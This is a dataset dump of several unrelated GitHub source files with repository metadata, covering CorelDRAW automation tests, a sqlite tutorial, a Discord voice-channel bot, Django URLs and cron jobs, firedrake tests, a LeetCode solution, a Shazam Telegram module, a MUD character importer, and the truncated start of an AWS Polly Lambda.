cdrObj.createColorObj([110,128,255],'unique_key','RGB') \n # 把颜色增加到调色板上\n cdrObj.addPletteColor(paletteObj,color)\n\n\n#测试调色板, 替换颜色\ndef paletteTest2():\n cdrObj = CDR()\n paletteObj = cdrObj.accessPalette('my') \n newColor = cdrObj.createColorObj([0,255,255],'unique_key','RGB') \n cdrObj.replacePletteColorByName(paletteObj,newColor)\n\n\n# 测试调色板,获取调色板中的指定颜色\ndef paletteTest3():\n cdrObj = CDR()\n print(cdrObj.app.Printers)\n\n # cdrObj.test()\n # paletteObj = cdrObj.accessPalette('test-paletter')\n # cdrObj.setPletteDefault(paletteObj)\n\n # 获取颜色对象 \n # colorObj = cdrObj.getPaletteColor(paletteObj,'unique_key')\n # 获取值\n # cmykValue = cdrObj.getColorValue(colorObj,'CMYK')\n # rgbValue = cdrObj.getColorValue(colorObj,'RGB')\n # hsbValue = cdrObj.getColorValue(colorObj,'HSB')\n # hlsValue = cdrObj.getColorValue(colorObj,'HLS')\n # cmkValue = cdrObj.getColorValue(colorObj,'CMY')\n # print(colorObj)\n\n\n# 导入文件,并替换对象\ndef replacePart():\n cdrObj = CDR()\n # 加载路径下的cdr文件,中的mytest对象\n # 替换到指定的对象\n # cdrObj.replacePart(['C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\2.cdr','mytest'],cdrObj.app.ActiveShape)\n\n\n# 保存文件\ndef testSaveCDR():\n cdrObj = CDR()\n\n # for thecolor in paletteObj.Colors():\n # print(thecolor)\n standardColor = {\n \"69_2_20_0\":\"深色背景\",\n \"1_0_0_0\":\"暮光之城色\",\n \"93_88_89_80\":\"仓色\",\n \"0_0_0_0\":\"白色\",\n \"100_88_47_61\":\"Stratos\"\n # \"6_4_4_0\":\"瓷色\"\n }\n\n errorObj = cdrObj.standardizedColor(standardColor)\n print(errorObj)\n # cdrObj.modifyShapeColor(errorObj.shapeObj)\n\n\n # for index in range(cdrObj.app.Palettes.Item(2).ColorCount):\n # cdrObj.app.Palettes.Item(2).Color(index+1).SetName(index)\n\n\n # print(cdrObj.app.PaletteManager.DefaultPalette.GetPalette(\"调色板\"))\n\n # 导出指定页面\n # cdrObj.exportBitmap(1,1136,700,'C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\test.jpg')\n \n # cdrObj.exportAllBitmap(1136,700,'C:\\\\Users\\\\Administrator\\\\Desktop\\\\111')\n # 导出所有页面\n # 只要目录\n # cdrObj.exportAllBitmap(1136,700,'C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\')\n # cdrObj.saveCDR('C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\51.cdr')\n\ndef testExportImage():\n cdrObj = CDR()\n cdrObj.exportBitmap('C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\test\\\\test.png',6)\n pass\n\n\ndef testCopy():\n cdrObj = CDR(\"D:\\\\github\\\\cdr\\\\mmxai\\\\src\\\\templates\\\\brochures\\\\画册-医疗-竖-001.cdr\")\n cdrObj1 = CDR(\"D:\\\\github\\\\cdr\\\\mmxai\\\\src\\\\templates\\\\brochures\\\\Backup_of_画册-医疗-竖-001.cdr\")\n cdrObj.acrossCopyToLayer(cdrObj1,6)\n\ndef getTextWidth(text,pointSize):\n font = TTFont('C:\\simsun.ttf')\n cmap = font['cmap']\n t = cmap.getcmap(3,1).cmap\n s = font.getGlyphSet()\n units_per_em = font['head'].unitsPerEm\n\n total = 0\n for c in text:\n if ord(c) in t and t[ord(c)] in s:\n total += s[t[ord(c)]].width\n else:\n total += s['.notdef'].width\n total = total*float(pointSize)/units_per_em;\n return total\n\ndef testFont():\n # font = TTFont('simsun.ttf')\n cdrObj = CDR()\n for k in cdrObj.app.FontList:\n print(k)\n # print(cdrObj.doc.ActiveShape.Text.Story.font)\n # cdrObj.doc.ActiveShape.Text.Story.charspacing = 0\n # a = cdrObj.doc.ActiveShape.SizeWidth\n # print(a)\n # cdrObj.doc.ActiveShape.Text.Story.charspacing = 100\n # b = cdrObj.doc.ActiveShape.SizeWidth\n # print(b)\n # print((b-a)/10)\n # width = getTextWidth('的',10)\n # print(width)\n\nif __name__ == '__main__':\n # testSaveCDR()\n # testSaveCDR()\n # importText()\n # paletteTest1()\n # paletteTest2()\n # testSaveCDR()\n testFont()\n\n \n \n\n", "repo_name": "JsAaron/cdr", "sub_path": "src/call.py", "file_name": "call.py", "file_ext": "py", "file_size_in_byte": 10088, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cdr.CDR", "line_number": 8, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 14, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 20, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 25, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 31, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 32, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 33, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 34, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 39, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 53, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 73, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 90, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 109, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 127, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 139, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 146, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 153, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 164, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 175, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 183, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 203, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 211, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 245, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 251, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 252, "usage_type": "call"}, {"api_name": "fontTools.ttLib.TTFont", "line_number": 256, "usage_type": "call"}, {"api_name": "cdr.CDR", "line_number": 273, "usage_type": "call"}]} +{"seq_id": "34064259824", "text": "import sqlite3\n\n# sqlite3.Connection 연결 객체 생성\nconn = sqlite3.connect('db.sqlite3')\n\ncur = conn.cursor()\n\ncur.execute(\n '''\n DROP TABLE IF EXISTS user\n '''\n)\ncur.execute(\n '''\n CREATE TABLE user (\n pk_user_id INTEGER,\n name TEXT,\n PRIMARY KEY (pk_user_id)\n )\n '''\n)\n\n# 데이터베이스의 CRUD\n# Create / Read / Update / Delete\n\n# CREATE 데이터 생성\ncur.execute(\n '''\n INSERT INTO user\n VALUES (1, 'seop')\n '''\n)\n\ncur.execute(\n '''\n INSERT INTO user\n VALUES (?, ?) \n ''',\n (2, '철수')\n)\n\nuser_list = [\n (4, '연수'),\n (3, '영희'),\n]\n\ncur.executemany(\n '''\n INSERT INTO user\n VALUES (?, ?)\n ''',\n user_list\n)\n\n# READ (조회)\ncur.execute(\n '''\n SELECT * FROM user\n '''\n)\n\n# row = cur.fetchone()\n# print(row)\n\n# rows = cur.fetchmany(size=2)\n# print(rows)\n\nrows = cur.fetchall()\nprint(rows)\n\n# UPDATE\ncur.execute(\n '''\n UPDATE user\n SET name='현영'\n WHERE pk_user_id = 4\n '''\n # WHERE pk_user_id >= 2 이런 식으로 범위 지정 가능\n)\n\n# DELETE\ncur.execute(\n '''\n DELETE FROM user\n WHERE pk_user_id = 4\n '''\n)\n\n'''\nUPDATE 테이블명\nSET 컬럼명 = 값\n[WHERE ]\n\nDELETE FROM 테이블명\n[WHERE 조건]\n'''\n\nconn.commit()\n", "repo_name": "sangseophwang/Pythonworkspace", "sub_path": "02. sql_practice/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "71194917953", "text": "import discord\nfrom discord.ext import commands\nfrom datetime import datetime\n\nfrom discord.ext.commands.errors import NoEntryPointError\n\nclass voicechannel(commands.Cog):\n def __init__(self, client):\n self.client = client\n \n @commands.Cog.listener()\n async def on_ready(self):\n print('voicechannel is ready')\n\n @commands.command()\n async def testcog_voicechannel(self, ctx):\n await ctx.send(\"Cog is ready\")\n\n @commands.command()\n async def set_parent_channel(self, ctx, id: int = 0):\n global parentid\n if(id ==0):\n await ctx.send(\"Az id nem lehet 0\")\n return\n with open(\"voicechannel/parentchannelids.txt\", 'a') as fp:\n fp.write(f\"{id}\\n\")\n\n @commands.command()\n async def get_parent_channels(self,ctx):\n\n with open(\"voicechannel/parentchannelids.txt\", \"r\") as fp:\n lines = fp.readlines()\n\n embed = discord.Embed(\n title = \"Parental voicechannels\",\n colour = discord.Colour.blue(),\n timestamp = datetime.utcnow()\n )\n embed.set_thumbnail(url= self.client.user.avatar_url)\n for x in lines:\n if(x==None):\n return\n ch = self.client.get_channel(int(x))\n embed.add_field(name=ch.name, value=f\"Guild: {ch.guild}\\n Category: {ch.category}\\n Position: {ch.position}\")\n\n await ctx.send(embed = embed)\n\n @commands.command()\n async def remove_parent_channel(self, ctx, id: int):\n with open(\"voicechannel/parentchannelids.txt\", \"r\") as fp:\n lines = fp.readlines()\n with open(\"voicechannel/parentchannelids.txt\", \"w\") as fp:\n for line in lines:\n if line.strip(\"\\n\") != f\"{id}\":\n fp.write(line)\n\n @commands.Cog.listener()\n async def on_voice_state_update(self, member, before, after):\n\n if(member.bot == True):\n return\n \n with open(\"voicechannel/parentchannelids.txt\", 'r') as fp:\n parentids = fp.read()\n\n #ha belép a szobát szeretnékbe\n if(after.channel !=None and str(after.channel.id) in parentids):\n print(\"joined to parent channel\")\n\n channelname = member.nick\n if member.nick == None:\n channelname = member.name\n channel = await member.guild.create_voice_channel(f\"{channelname} által kért voice\")\n await channel.edit(position=after.channel.position+1, category=after.channel.category, sync_permissions=True)\n await channel.set_permissions(member, manage_channels=True)\n await member.move_to(channel)\n\n with open(\"voicechannel/channelids.txt\", 'a') as fp:\n fp.write(f\"{channel.id}\\n\")\n\n # ha lelép a kapott szobából\n if(before.channel != None and after.channel == None):\n with open(\"voicechannel/channelids.txt\", 'r') as fp:\n content = fp.read()\n if(len(before.channel.members)==0 and str(before.channel.id) in content):\n await before.channel.delete()\n\n with open(\"voicechannel/channelids.txt\", \"r\") as fp:\n lines = fp.readlines()\n with open(\"voicechannel/channelids.txt\", \"w\") as fp:\n for line in lines:\n if line.strip(\"\\n\") != f\"{before.channel.id}\":\n fp.write(line)\n\n #ha ellép a kapott szobából\n if(before.channel != None and after.channel != None):\n with open(\"voicechannel/channelids.txt\", 'r') as fp:\n content = fp.read()\n if(len(before.channel.members)==0 and str(before.channel.id) in content):\n await before.channel.delete()\n\n with open(\"voicechannel/channelids.txt\", \"r\") as fp:\n lines = fp.readlines()\n with open(\"voicechannel/channelids.txt\", \"w\") as fp:\n for line in lines:\n if line.strip(\"\\n\") != f\"{before.channel.id}\":\n fp.write(line)\n\n\ndef setup(client):\n client.add_cog(voicechannel(client))\n\n", "repo_name": "Bende126/vikbot", "sub_path": "cogs/voicechannel.py", "file_name": "voicechannel.py", "file_ext": "py", "file_size_in_byte": 4186, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 7, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 7, "usage_type": "name"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 11, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 11, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 15, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 15, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 19, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 19, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 34, "usage_type": "call"}, {"api_name": "discord.Colour.blue", "line_number": 36, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 36, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 28, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 28, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 48, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 48, "usage_type": "name"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 57, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 57, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "36531102680", "text": "\"\"\"py_township URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nfrom app_root.helpers.views import HexToBinaryView, Base64EncodeDecodeView, GzipCompressUncompressView, \\\n FlowView_fetch_data, FlowView_fetch_city\n\napp_name = 'helpers'\n\nurlpatterns = [\n path('hex2bin/', HexToBinaryView.as_view(), name='hex2bin'),\n path('base64/', Base64EncodeDecodeView.as_view(), name='base64'),\n path('gzip/', GzipCompressUncompressView.as_view(), name='gzip'),\n path('flow/fetch_data/', FlowView_fetch_data.as_view(), name='flow_fetch_data'),\n path('flow/fetch_city/', FlowView_fetch_city.as_view(), name='flow_fetch_city'),\n]\n", "repo_name": "Gaolious/analysis-township", "sub_path": "py_township/township/app_root/helpers/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "app_root.helpers.views.HexToBinaryView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "app_root.helpers.views.HexToBinaryView", "line_number": 25, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "app_root.helpers.views.Base64EncodeDecodeView.as_view", "line_number": 26, "usage_type": "call"}, {"api_name": "app_root.helpers.views.Base64EncodeDecodeView", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "app_root.helpers.views.GzipCompressUncompressView.as_view", "line_number": 27, "usage_type": "call"}, {"api_name": "app_root.helpers.views.GzipCompressUncompressView", "line_number": 27, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "app_root.helpers.views.FlowView_fetch_data.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "app_root.helpers.views.FlowView_fetch_data", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "app_root.helpers.views.FlowView_fetch_city.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "app_root.helpers.views.FlowView_fetch_city", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "2149155639", "text": "from firedrake import *\nimport pytest\nimport ufl\n\n\ndef test_extruded_interval_area():\n m = UnitIntervalMesh(10)\n\n DG = VectorFunctionSpace(m, 'DG', 1)\n new_coords = project(m.coordinates, DG)\n m._coordinate_fs = new_coords.function_space()\n m.coordinates = new_coords\n\n ufl.dx._subdomain_data = m.coordinates\n V = FunctionSpace(m, 'CG', 1)\n u = Function(V)\n u.assign(1)\n\n assert abs(assemble(u*dx) - 1.0) < 1e-12\n\n e = ExtrudedMesh(m, layers=4, layer_height=0.25)\n\n V = FunctionSpace(e, 'CG', 1)\n u = Function(V)\n u.assign(1)\n\n assert abs(assemble(u*dx) - 1.0) < 1e-12\n\n\ndef test_extruded_periodic_interval_area():\n m = PeriodicUnitIntervalMesh(10)\n\n V = FunctionSpace(m, 'CG', 1)\n u = Function(V)\n u.assign(1)\n assert abs(assemble(u*dx) - 1.0) < 1e-12\n\n e = ExtrudedMesh(m, layers=4, layer_height=0.25)\n V = FunctionSpace(e, 'CG', 1)\n u = Function(V)\n u.assign(1)\n\n assert abs(assemble(u*dx) - 1.0) < 1e-12\n\n\nif __name__ == '__main__':\n import os\n pytest.main(os.path.abspath(__file__))\n", "repo_name": "gmarkall/firedrake", "sub_path": "tests/extrusion/test_extrusion_0_dg_coords.py", "file_name": "test_extrusion_0_dg_coords.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "ufl.dx", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pytest.main", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "32223635271", "text": "from typing import List\n\nclass Solution:\n def minimumTotal(self, triangle: List[List[int]]) -> int:\n def miniIndex(triangle, index):\n num_layers = len(triangle)\n \n if len(triangle) == 0:\n return 0\n elif len(triangle) == 1:\n return triangle[0][0]\n elif index == 0:\n return miniIndex(triangle[:num_layers-1], index) + triangle[-1][index]\n elif index == len(triangle[-1]) -1:\n return triangle[-1][index] + miniIndex(triangle[:num_layers-1], index-1) \n else: \n return triangle[-1][index] + min(miniIndex(triangle[:num_layers-1], index), miniIndex(triangle[:num_layers - 1], index -1))\n\n if len(triangle) == 0:\n return 0\n else:\n res = []\n for index in range(len(triangle[-1])):\n res.append(miniIndex(triangle, index))\n return min(res)\n\nclass Solution1:\n def minimumTotal(self, triangle: List[List[int]]) -> int:\n if len(triangle) == 0:\n return 0\n \n res = []\n for i in range(len(triangle)):\n res.append([])\n for index, j in enumerate(triangle[i]):\n if i == 0:\n res[i].append(triangle[0][0])\n elif index == 0:\n res[i].append(res[i-1][0] + triangle[i][0])\n elif index == len(triangle[i]) - 1:\n res[i].append(res[i-1][-1] + triangle[i][-1])\n else:\n res[i].append(min(res[i-1][index], res[i-1][index - 1]) + triangle[i][index] )\n return min(res[-1])\n\n\n\n\nsol = Solution1()\ntra = [[2],[3,4],[6,5,7],[4,1,8,3]]\nres = sol.minimumTotal(tra)\nprint(res)\n \n \n \ntra = [[-10]]\nres = sol.minimumTotal(tra)\nprint(res)\n\n", "repo_name": "chrisbyd/leetcode_chris", "sub_path": "array/120.py", "file_name": "120.py", "file_ext": "py", "file_size_in_byte": 1881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "23993187529", "text": "import io\n\nfrom ShazamAPI import Shazam\n\nfrom .. import loader, utils\n\n\n@loader.tds\nclass ShazamMod(loader.Module):\n \"\"\"Shazam API\"\"\"\n\n strings = {\"name\": \"Shazam API\"}\n tag = \"[Shazam] \"\n\n @loader.owner\n async def shazamcmd(self, m):\n \"\"\"(реплай на аудио) - распознать трек\"\"\"\n s = await get_audio_shazam(m)\n if not s:\n return\n try:\n shazam = Shazam(s.track.read())\n recog = shazam.recognizeSong()\n track = next(recog)[1][\"track\"]\n await m.client.send_file(\n m.to_id,\n file=track[\"images\"][\"background\"],\n caption=self.tag + \"Распознанный трек: \" + track[\"share\"][\"subject\"],\n reply_to=s.reply.id,\n )\n await m.delete()\n except:\n await m.edit(f\"{self.tag}Не удалось распознать...\")\n\n async def shazamtextcmd(self, m):\n \"\"\"(реплай на аудио) - узнать текст трека\"\"\"\n s = await get_audio_shazam(m)\n if not s:\n return\n try:\n shazam = Shazam(s.track.read())\n recog = shazam.recognizeSong()\n track = next(recog)[1][\"track\"]\n text = track[\"sections\"][1][\"text\"]\n await utils.answer(\n m,\n \"\\n\".join(\n self.tag + f\"Текст трека {track['share']['subject']}\\n\\n\" + text\n ),\n )\n except:\n await m.edit(f\"{self.tag}Не удалось распознать... | Текста нет...\")\n\n\nasync def get_audio_shazam(m):\n class rct:\n track = io.BytesIO()\n reply = None\n\n reply = await m.get_reply_message()\n if reply and reply.file and reply.file.mime_type.split(\"/\")[0] == \"audio\":\n ae = rct()\n await utils.answer(m, \"[Shazam] Скачиваю...\")\n ae.track = io.BytesIO(await reply.download_media(bytes))\n ae.reply = reply\n await m.edit(\"[Shazam] Распознаю...\")\n return ae\n else:\n await utils.answer(m, \"[Shazam] реплай на аудио...\")\n return None", "repo_name": "drenix-drenix/modules", "sub_path": "Shazam API.py", "file_name": "Shazam API.py", "file_ext": "py", "file_size_in_byte": 2253, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ShazamAPI.Shazam", "line_number": 22, "usage_type": "call"}, {"api_name": "ShazamAPI.Shazam", "line_number": 41, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 57, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "30199176303", "text": "from shinymud.lib.sport_plugins import SportError\nfrom shinymud.models.player import Player\nfrom shinymud.models.item import GameItem\nfrom shinymud.models.item_types import ITEM_TYPES\n\nimport traceback\nimport json\nimport re\n\ndef format(world, raw_data):\n \"\"\"Deserialize a player character saved in ShinyFormat and adds it to \n the world.\n \n raw_data - the data to be deserialized into a player object.\n world - The World instance\n \"\"\"\n pc = json.loads(_match_shiny_tag('Player', raw_data))\n items = json.loads(_match_shiny_tag('Inv Items', raw_data))\n # Build the area from the assembled dictionary data\n try:\n new_pc = Player(('foo', 'bar'))\n new_pc.playerize(pc)\n new_pc.save()\n # Inventory time!\n containers = {} # old_container_dbid : [new_containee1, ...]\n old_new = {} # old dbid's mapped to their new ones\n \n for item in items:\n my_container = item[0].get('container')\n old_dbid = item[0]['dbid']\n del item[0]['dbid']\n if item[0].get('owner'):\n item[0]['owner'] = new_pc.dbid\n else:\n del item[0]['container']\n i = GameItem(item[0])\n i.save()\n load_item_types(i, item[1])\n old_new[old_dbid] = i.dbid\n if my_container:\n if containers.get(my_container):\n containers[my_container].append(i)\n else:\n containers[my_container] = [i]\n \n for old_container_dbid, containees_list in containers.items():\n for containee in containees_list:\n containee.container = old_new.get(old_container_dbid)\n containee.save()\n \n except Exception as e:\n # if anything went wrong, make sure we destroy any leftover character\n # data. This way, we won't run into problems if they try to import it\n # again, and we won't leave orphaned or erroneous data in the db.\n world.log.error(traceback.format_exc())\n try:\n new_pc.destruct()\n except:\n # if something goes wrong destroying the pc, it probably means we\n # didn't get far enough to have anything to destroy. Just ignore any\n # errors.\n pass\n \n raise SportError('There was a horrible error on import! '\n 'Aborting! Check logfile for details.')\n \n return 'Character \"%s\" has been successfully imported.' % new_pc.fancy_name()\n\ndef load_item_types(item, item_types):\n for name,data in item_types.items():\n if name in ITEM_TYPES:\n data['game_item'] = item.dbid\n new_itype = ITEM_TYPES[name](data)\n new_itype.save()\n\ndef _match_shiny_tag(tag, text):\n \"\"\"Match a ShinyTag from ShinyFormat.\n tag -- the name of the tag you wish to match\n text -- the text to be searched for the tags\n Returns the string between the tag and its matching end-tag.\n Raises an exception if the tag is not found.\n \"\"\"\n exp = r'\\[' + tag + r'\\](\\n)?(?P.*?)(\\n)?\\[End ' + tag +\\\n r'\\](\\n)?'\n match = re.search(exp, text, re.I | re.S)\n if not match:\n raise SportError('Corrupted file: missing or malformed %s tag.' % tag)\n return match.group('tag_body')\n", "repo_name": "shinymud/ShinyMUD", "sub_path": "src/shinymud/lib/sport_plugins/formatters/player_read_shiny_format.py", "file_name": "player_read_shiny_format.py", "file_ext": "py", "file_size_in_byte": 3355, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "shinymud.models.player.Player", "line_number": 21, "usage_type": "call"}, {"api_name": "shinymud.models.item.GameItem", "line_number": 36, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 55, "usage_type": "call"}, {"api_name": "shinymud.lib.sport_plugins.SportError", "line_number": 64, "usage_type": "call"}, {"api_name": "shinymud.models.item_types.ITEM_TYPES", "line_number": 71, "usage_type": "name"}, {"api_name": "shinymud.models.item_types.ITEM_TYPES", "line_number": 73, "usage_type": "name"}, {"api_name": "re.search", "line_number": 85, "usage_type": "call"}, {"api_name": "re.I", "line_number": 85, "usage_type": "attribute"}, {"api_name": "re.S", "line_number": 85, "usage_type": "attribute"}, {"api_name": "shinymud.lib.sport_plugins.SportError", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "23913555582", "text": "from django.utils import timezone\nfrom django_cron import CronJobBase, Schedule\nfrom news.service.feed_services import all_feeds_link\nfrom news.service.profile_services import all_profile\nfrom news.utility.populate_utilities import update_feed\nfrom news.utility.recommend_utilities import recommend_based_content\n\n\nclass update_rss(CronJobBase):\n RUN_EVERY_MINS = 15\n RETRY_AFTER_FAILURE_MINS = 5\n\n schedule = Schedule(run_every_mins=RUN_EVERY_MINS,\n retry_after_failure_mins=RETRY_AFTER_FAILURE_MINS)\n code = 'cron.update_rss'\n\n @staticmethod\n def do():\n print(\"INI CRON1 - Actualizando entradas ({})\".format(timezone.now()))\n for link in all_feeds_link():\n try:\n update_feed(link, printer=True)\n except Exception as excep:\n print(\"Error de cron: {}\".format(excep))\n\n print(\"FIN CRON1 - Actualizando entradas ({})\".format(timezone.now()))\n\n\nclass calculate_keywords(CronJobBase):\n RUN_EVERY_MINS = 30\n RETRY_AFTER_FAILURE_MINS = 5\n\n schedule = Schedule(run_every_mins=RUN_EVERY_MINS,\n retry_after_failure_mins=RETRY_AFTER_FAILURE_MINS)\n code = 'cron.calculate_keywords'\n\n @staticmethod\n def do():\n print(\"INI CRON2 - Calculando keywords por cada usuario ({})\".format(timezone.now()))\n\n print('\\tBasado en contenido')\n for profile in all_profile():\n print('\\t\\tINI {}'.format(profile))\n\n try:\n critics, keywords = recommend_based_content(profile)\n print('\\t\\t\\tKeywords: {}'.format(keywords))\n except Exception as excep:\n print(\"Error de cron: {}\".format(excep))\n\n print(\"FIN CRON2 - Calculando keywords por cada usuario ({})\".format(timezone.now()))", "repo_name": "ltnews/ltnews-backend", "sub_path": "ltnews/cron.py", "file_name": "cron.py", "file_ext": "py", "file_size_in_byte": 1811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django_cron.CronJobBase", "line_number": 9, "usage_type": "name"}, {"api_name": "django_cron.Schedule", "line_number": 13, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 19, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 19, "usage_type": "name"}, {"api_name": "news.service.feed_services.all_feeds_link", "line_number": 20, "usage_type": "call"}, {"api_name": "news.utility.populate_utilities.update_feed", "line_number": 22, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 26, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 26, "usage_type": "name"}, {"api_name": "django_cron.CronJobBase", "line_number": 29, "usage_type": "name"}, {"api_name": "django_cron.Schedule", "line_number": 33, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 39, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 39, "usage_type": "name"}, {"api_name": "news.service.profile_services.all_profile", "line_number": 42, "usage_type": "call"}, {"api_name": "news.utility.recommend_utilities.recommend_based_content", "line_number": 46, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 51, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "29698266021", "text": "import boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nimport os\nfrom contextlib import closing\nimport json\n\n\ndef convert_to_video(event, context):\n postId = event[\"Records\"][0][\"Sns\"][\"Message\"]\n\n # Retrieving information about the post from DynamoDB table\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table(os.environ['DYNAMODB_TABLE'])\n postItem = table.query(\n KeyConditionExpression=Key('id').eq(postId)\n )\n\n text = postItem[\"Items\"][0][\"text\"]\n voice = postItem[\"Items\"][0][\"voice\"]\n\n rest = text\n\n # Because single invocation of the polly synthesize_speech api can\n # transform text with about 1,500 characters, we are dividing the\n # post into blocks of approximately 1,000 characters.\n textBlocks = []\n while len(rest) > 1100:\n begin = 0\n end = rest.find(\".\", 1000)\n\n if end == -1:\n end = rest.find(\" \", 1000)\n\n textBlock = rest[begin:end]\n rest = rest[end:]\n textBlocks.append(textBlock)\n textBlocks.append(rest)\n\n # For each block, invoke Polly API, which will transform text into audio\n polly = boto3.client('polly')\n for textBlock in textBlocks:\n response = polly.synthesize_speech(\n OutputFormat='mp3',\n 